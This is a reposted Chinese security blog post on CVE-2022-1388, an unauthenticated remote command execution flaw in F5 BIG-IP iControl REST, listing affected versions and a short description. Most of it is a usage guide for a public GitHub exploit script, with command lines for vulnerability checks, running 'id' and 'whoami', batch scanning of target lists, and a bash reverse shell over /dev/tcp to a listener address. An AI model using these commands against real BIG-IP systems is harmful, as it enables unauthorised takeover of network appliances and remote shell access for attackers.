CVE-2022-1388:F5 BIG-IP iControl REST RCE

admin 2022年5月12日13:36:11安全漏洞评论10 views1059字阅读3分31秒阅读模式

文章前言

本篇文章本来打算时三天之前发的,但是由于文章排期所以到了今天了,略有延迟,本篇文章主要侧重于CVE-2022-1388的检测与利用

影响范围

  • F5 BIG-IP 11.6.1 - 11.6.5

  • F5 BIG-IP 12.1.0 - 12.1.6

  • F5 BIG-IP 13.1.0 - 13.1.4

  • F5 BIG-IP 14.1.0 - 14.1.4

  • F5 BIG-IP 15.1.0 - 15.1.5

  • F5 BIG-IP 16.1.0 - 16.1.2

漏洞描述

CVE-2022-1388漏洞由F5内部发现并披露,此漏洞允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务,算的上是CVE-2021-22986的后续

漏洞检测

项目地址

https://github.com/Al1ex/CVE-2022-1388


基本使用

python3 CVE_2022_1388.py

CVE-2022-1388:F5 BIG-IP iControl REST RCE


漏洞检测

python3 CVE_2022_1388.py -v true -u https://192.168.17.200

CVE-2022-1388:F5 BIG-IP iControl REST RCE


命令执行

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

CVE-2022-1388:F5 BIG-IP iControl REST RCE


python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

CVE-2022-1388:F5 BIG-IP iControl REST RCE


批量检测

python3 CVE_2022_1388.py -s true -f check.txt

CVE-2022-1388:F5 BIG-IP iControl REST RCE


反弹shell

python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

CVE-2022-1388:F5 BIG-IP iControl REST RCE


CVE-2022-1388:F5 BIG-IP iControl REST RCE



参考链接

https://support.f5.com/csp/article/K23605346

https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388

https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr

原文始发于微信公众号(七芒星实验室):CVE-2022-1388:F5 BIG-IP iControl REST RCE

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月12日13:36:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2022-1388:F5 BIG-IP iControl REST RCE http://cn-sec.com/archives/1001299.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: